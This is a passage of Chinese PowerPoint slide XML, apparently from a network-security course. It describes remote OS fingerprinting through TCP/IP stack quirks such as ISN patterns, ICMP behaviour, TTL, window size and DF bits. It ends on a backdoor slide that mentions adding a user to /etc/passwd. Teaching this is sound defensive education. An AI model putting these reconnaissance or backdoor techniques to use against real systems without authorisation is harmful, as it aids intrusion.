              <a:t>时采用不同的方法。一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统采用传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>64K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>递增方法，较新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IRIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FreeBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Digital Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等系统则采用随机增量的方法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux 2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OpenVMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>AIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等系统采用真随机方法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统采用一种时间相关的模型。还有一些系统使用常数，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3Com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>集线器使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x803</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apple LaserWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打印机使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>OxC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 7001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误信息时，不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有不同的行为。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC 1812</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>建议限制各种错误信息的发送率。有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>做了限制，有的没有。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消息引用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误消息可以引用一部分引起错误的原消息。在处理端口不可达消息时，大多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>送回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求头外加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>送回的稍多，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更多。有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会把引起错误消息的头做一些改动再发回来。例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FreeBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OpenBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ULTRIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>VAXen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等会改变头的旧。这种方法功能很强，甚至可以在目标主机没有打开任何监听端口的情况下就识别出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分段重组处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的分段重组时，不同 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的处理方式不同。有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会用新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段覆盖旧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段，而有些则会用旧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段覆盖新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（最大分段尺寸）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有不同的默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值，对不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值的回应也不尽相同。如给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值很小的包，它一般会把这个值原封不动地返回，但其他系统会返回不同的值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SYNFlood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>限度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时，不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有不同的特点。如果短时间内收到很多的伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包，一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会停止接受新的连接。有的系统以支持扩展的方式来防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115826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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11582665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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采样</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的初始化窗口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消息抑制机制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误引用机制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ToS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字段的设置 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位的设置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误信息回显完整性 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值 </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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1432249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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1</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TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>操作系统对出站的数据包设置的存活时间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2</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Windows Size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>操作系统设置的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>窗口大小这个大小是在发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>信息包时包含的选项</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3</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DF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>可以查看操作系统是否设置了不准分片位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>查看操作系统是否设置了服务类型</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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202521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626C6A-2839-402D-AC80-10DFD39C3857}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193538" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193539"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00117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141CF-DB3D-468A-BDF1-C0E57C47D2CC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>104</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46750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3A4DE7-CC8B-4A84-8FA7-B4C69C4C47FD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>105</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12909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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>后门技术</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简单的就是添加用户到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
